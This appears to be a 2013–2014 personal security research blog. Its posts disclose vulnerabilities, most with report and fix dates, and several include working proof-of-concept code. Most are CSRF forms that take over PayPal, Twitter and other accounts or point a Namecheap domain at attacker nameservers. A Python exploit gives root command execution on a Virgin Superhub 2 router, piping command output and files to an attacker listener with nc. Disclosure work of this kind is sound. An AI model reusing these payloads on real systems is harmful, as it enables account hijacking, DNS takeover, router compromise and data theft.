Henry Hoggard

security research, privacy and vulns

Hijacking Paypal Accounts Using the SMS Feature

by Henry on June 2, 2014

After finding the Cross Site Request Forgery in Twitter, allowing me to Tweet and Direct message from any account using a bug in the add a mobile feature. I decided to cross reference across other websites with a SMS feature, I chose Paypal as it is usually pretty easy to find a bug in Paypal. After intercepting the requests, I found that Paypal did not ask for any CSRF tokens to add a mobile device to the account. This was exciting because Paypal allows you to send and receive money using SMS. It also allows you to check the balance of the account. https://www.paypal.com/us/webapps/mpp/mobile/mobile-text

PoC
Direct your target to the the first CSRF page, this will send a request to add your phone number to their account. You will then receive a security code to your phone needed to verify the number. One you have received this, direct them to the second CSRF page, this will verify the phone number using the security code.
CSRF 1: Add Phone number to account

<html>

  <body>
    <form action="https://www.paypal.com/webapps/customerprofile/phone/confirm" method="POST">
      <input type="hidden" name="formAction" value="add" />
      <input type="hidden" name="actionId" value="doAction" />
      <input type="hidden" name="phoneType" value="MOBILE" />
      <input type="hidden" name="countryCode" value="GB" />
      <input type="hidden" name="phoneId" value="" />
      <input type="hidden" name="phoneNumber" value="324124142124" />
      <input type="hidden" name="sendCode" value="Send&#32;Code" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CSRF 2: Verify Phone Number

<html>

  <body>
    <form action="https://www.paypal.com/webapps/customerprofile/phone/verify" method="POST">
      <input type="hidden" name="actionId" value="doAction" />
      <input type="hidden" name="phoneNumber" value="" />
      <input type="hidden" name="phoneType" value="" />
      <input type="hidden" name="confCode" value="12323123" />
      <input type="hidden" name="continue" value="Confirm&#32;Phone&#32;Number" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Blacklist Phone Numbers with Drozer on Cyanogen Mod

by Henry on April 17, 2014

Issue: https://jira.cyanogenmod.org/browse/CYAN-3727

Fixes:

http://review.cyanogenmod.org/#/c/62149

http://review.cyanogenmod.org/#/c/62151/

http://review.cyanogenmod.org/#/c/62150/

 

Any application on Cyanogen Mod can read and write to the Blacklist provider without requiring a permission. This isn’t a high risk issue, but could allow malware to prevent all numbers from contacting the device.

PoC

dz> run app.provider.insert content://blacklist –integer _id 3 –integer number 9419 –integer normalized_number 9419 –integer is_regex 0 –integer phone 1 –integer message 1
Done.

dz> run app.provider.query content://blacklist/

_id number normalized_number is_regex phone message
2 1337 1337 0 1 1
1 2284599 2284599 0 1 1
3 9419 9419 0 1 1

Virgin Superhub 2 Remote Command Execution As Root

by Henry on March 11, 2014

I recently read the writeup on the Virgin Superhub 7 second bootup flaw (http://ramblingrant.co.uk/2014/03/06/virgin-media-superhub-7-second-security-flaw/), this motivated me to post a remote command execution vulnerability that I found a while back.

The vulnerability occurs in the traceroute feature in the admin panel. It executes the shell command traceroute, where the user controls IP address, so the attacker can escape the shell command and execute any command they want – as root, no privilege escalation necessary. For example we control the host variable in the pseudo code for the traceroute function below.

Pseudo Code

exec("traceroute " + host + " " + arguments)

To make it easier exploiting this I have written a shell script that emulates a terminal by sending the results of the commands to a listener using netcat.

Exploit

import requests
import socket
import re
import json
ip = '192.168.0.8'
port = 9991
file_port = 9992
size = 1024
host = ''
backlog = 5

def getToken():
    regex = '<input type="hidden" name="(.*)" value'
    content = requests.get('http://192.168.0.1/VmRgTraceRoute.html').text
    token = re.findall(regex,content)
    return token[4]

def postRequest(token, cmd):
    data = {"VmCheckRun": 0, "VmCheckContent":1,"VmTraceRouteHost": cmd, "VmTraceRouteToolCommand": 1, "VmTraceRouteStats": "pwned", token : 0}
    r = requests.post("http://192.168.0.1/cgi-bin/TraceRouteCgi",data=data)

def processCMD(cmd):
    token = getToken()
    cmd = ";export test1=`" + cmd + "`; echo $test1 | nc " + ip + " " + str(port) + " ; echo lol"
    postRequest(token,cmd)

def getFile(filename):
    finished =0
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host,file_port))
    s.listen(backlog)
    cmd = ";nc " + ip + " " + str(file_port) + " < " + filename + "; echo"
    token = getToken()
    postRequest(token,cmd)
    while finished ==0:
        client, address = s.accept()
        data = client.recv(500000)
        if data:
            print data
            client.close()
            s.shutdown(socket.SHUT_WR)
            s.close()
            finished = 1

def listenSocket():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host,port))
    s.listen(backlog)
    while 1:
        cmd = raw_input("> ")
        if "getfile" in cmd:
            print cmd.split(" ")[1]
            getFile(cmd.split(" ")[1])
        else:
            processCMD(cmd)
            client, address = s.accept()
            data = client.recv(size)

            if data:
                print data
                client.close()

listenSocket()

Usage
Ensure you are logged into the device admin panel. Edit the python script and replace the IP and port with your local IP and port, this must be allowed through your firewall because you need to listen to read the result of your commands.

python routerexploit.py

 ls # type any command to execute shell command on device

 getfile /etc/hosts # type "getfile" to  download file from device

Mitigation

Simply change the admin panel password, an attacker needs to be authenticated to exploit this bug.

 

Future Work
Using this exploit you can pull the custom binaries off the device and look for more bugs and backdoors. You could also use this to attempt to port custom firmware such as dd-wrt to this device.

Gandi.net Domain Forwarding CSRF

by Henry on January 23, 2014

Reported: Jan 20 2014

Fixed: Jan 22 2014

This Cross Site Request Forgery bug allows attackers to add subdomains that forward to a URL of their choice. eg malicious.henryhoggard.co.uk
It occurs because there is no CSRF token.
POC


<html>
   <body>
     <form action="https://www.gandi.net/admin/domain/http_redirection/create/"
 method="POST">
       <input type="hidden" name="type" value="301" />
       <input type="hidden" name="subdomain" value="test1" />
       <input type="hidden" name="redirect&#95;type"
 value="http&#58;&#47;&#47;" />
       <input type="hidden" name="redirect" value="test&#46;com" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
 </html>

&nbsp;

Transmission 2.80 Torrent Client Denial of Service

by Henry on December 23, 2013

Reported: 17/07/2013
Fix Provided: 20/07/2013
Tested on: Ubuntu & Mac OSX

Providing a magnet link with a large tracker URL string crashes the torrent client Transmission, preventing you from opening it again.

Proof of Concept
udp://open.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.com:1337

Hijacking DNS on NameCheap Domains [Updated]

by Henry on December 23, 2013

Reported: 03/06/2013

Vendor Reported as Fixed: 23/12/2013

A bug in Namecheap’s DNS setup page was vulnerable to Cross Site Request Forgery, allowing attackers to set custom DNS servers for a target domain, which would let attackers hijack the DNS records and display a fake website on the target domain. Or redirect MX records and intercept email.

Proof of Concept

&lt;/pre&gt;<br />&lt;form action="https://manage.www.namecheap.com/myaccount/modsingle.asp?domain=targetdomain.org&amp;type=dns" method="POST"&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NSOption" value="custom" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="customdnstype" value="customdns" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NS1" value="ns1.evildns.org" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NS2" value="ns2.evildns.org" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NS3" value="" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NS4" value="" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NS5" value="" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NS6" value="" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NS7" value="" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NS8" value="" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NS9" value="" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NS10" value="" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NS11" value="" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NS12" value="" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NSSUBMIT" value="Save Changes" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="NS.x" value="NS" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="hidden" name="Domain" value="targetdomain.org" /&gt;<br /><%%KEEPWHITESPACE%%>      &lt;input type="submit" value="Submit request" /&gt;<br /><%%KEEPWHITESPACE%%>    &lt;/form&gt;<br />&lt;pre&gt;<br /><br />

Aether – Not Completely Anonymous!

by Henry on November 24, 2013


“tl;dr Aether is a distributed network that creates forum–like, anonymous and encrypted public spaces for its constituents. No registration necessary”

I was really interested to hear about Aether, a new distributed forum-like software. Aether is marketed as an anonymous, distributed and encrypted forum system. This blog post is just a reminder to all, that like a lot of P2P software, it is not completely anonymous.

Is Aether Anonymous?
From the point of view of accounts, yes, there is no extra information stored and tied to accounts on Aether, the only identifying information is the handle you choose, which is not tied to a single user, anyone can use that handle.

However from the point of view of IP addresses and connection information, no, using tools like netstat, wireshark and lsof, you can view other nodes connected to the network. So be aware that when you are posting your worldly views, that your IP address is easily accessible. So it is recommended to connect through a VPN or TOR.

:~ sudo lsof -i -P

aether    23356   TCP 10.113.3.7:49819->82-60-93-222.dsl.in-addr.zen.co.uk:63677 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49820->178-190-233-146.adsl.highway.telekom.at:54590 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49821->host86-120-245-28.range86-129.btcentralplus.com:58426 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49822->chellj080108139058.2.12.vie.surfer.at:56355 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49824->62.80.69.138.dyn.user.ono.com:60594 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49825->cpc4-lee212-2-0-cust492.7-1.cable.virginm.net:64890 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49826->cable-213-30-236-69.zeelandnet.nl:2669 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49827->78.178.191.40.dynamic.ttnet.com.tr:53450 (SYN_SENT)
aether    23356   TCP 10.113.3.7:49828->c-174-61-6-50.hsd1.fl.comcast.net:59805 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49829->ip-31-205-61-124.ask4internet.com:61056 (SYN_SENT)
aether    23356   TCP 10.113.3.7:49830->0x3ec63d07.inet.dsl.telianet.dk:52074 (SYN_SENT)
aether    23356   TCP 10.113.3.7:49831->cpc8-cwma7-2-5-cust91.7-3.cable.virginm.net:34198 (SYN_SENT)

* certain information such as IP addresses, have been modified or stripped out for privacy reasons

But don’t let that stop you, personally I love Aether, its aesthetically pleasing, easy to use, and a brilliant idea!

Cyber Security Challenge Change Password CSRF

by Henry on November 23, 2013

Cross Site Request Forgery Vulnerability in

https://cybersecuritychallenge.org.uk/

Reported: 10/08/13
Fixed: 12/08/13

The Cyber Security challenge is a UK based organisation organising security based challenges for enthusiasts. The bug was a Cross Site Request Forgery vulnerability and was found in the user profile page on the Cyber Security Challenge website. This allowed attackers to change the password of the target user and login to their account. The bug was reported on the 10th of July 2013 and the bug was swiftly fixed a couple of days after.

Exploit

<!doctype html>
<html>
<body>
<form name="form0"
action="https://cybersecuritychallenge.org.uk/registration/index.php/player/change_password/change"
method="post">
<input type="hidden" name="user_newpass" value="1234567" />
<input type="hidden" name="user_newpass2" value="1234567" />
<input type="submit" value="Perform CSRF" />
</form>
</body>
</html>

The bug that let me Tweet from Any Twitter Account

by Henry on November 6, 2013

In this post I will explain how I could read direct messages and Tweet from anyones Twitter account using a Cross Site Request Forgery vulnerability.

Timeline
Discovered: Sunday 3rd November
Reported: Sunday 3rd November
Fixed: Sunday 3rd November

What is Cross Site Request Forgery?
“CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker’s choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.” Source: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29

The Exploit
The vulnerability allows me to Tweet from anyone’s Twitter account and read their direct messages. It exists in the add a mobile device feature of Twitter, where you can add a mobile device to control your account via SMS. (https://twitter.com/settings/devices) To exploit this we create a CSRF page that will add the attackers mobile number and network to the victims account. Although the page does provide an authenticity token aimed at preventing CSRF, it does not seem to validate that the token is correct, and therefore, we can enter any value.

The exploit code below shows the PoC that I used to send the request, of course attackers could disguise this as a real webpage and send the request in the background.

<form action="https://twitter.com/settings/devices/create" method="POST"><input type="hidden" name="device_type" value="phone" />
<input type="hidden" name="authenticity_token" value="randomthinghere" />
<input type="hidden" name="device[country_code]" value="+44" />
<input type="hidden" name="device_country_intl_prefix" value="+44" />
<input type="hidden" name="device[region_country_code]" value="" />
<input type="hidden" name="device[address]" value="7123456789" />
<input type="hidden" name="carrier_name" value="Vodafone" />
<input type="hidden" name="device[carrier]" value="vodafone_uk" />
<input type="submit" value="Submit request" /></form><script type="text/javascript">
document.forms[0].submit();></script>

I will demo this vulnerability on my device on the Vodafone network, the network and country are important, as the mobile sms code changes for each network. Using some social engineering the attacker can force the target to visit the webpage with the exploit code on it, once we are sure the target has visited the page, Twitter will be waiting for the device to be activiated: Text “GO” to the mobile short code, in my case it was 86444. Then you will receive a confirmation SMS saying you have activated the device with the account. From here you can simply text the number to send a Tweet on the users account.

“GO” -> 86444

“Your phone is activated! Reply w/ help to checkout all the things you can do with Twitter Text messaging…”

This now indicates we have successfully compromised the account, we can now send Tweets from the targets account.

Next I can send any message to 86444:
“Here is my PoC message”

 

Severity
Using this I could use all of the Twitter SMS features, including sending Tweets, sending messages and reading direct messages

Protect Yourself
To protect yourself against these types of attacks in the future, I recommend Noscript.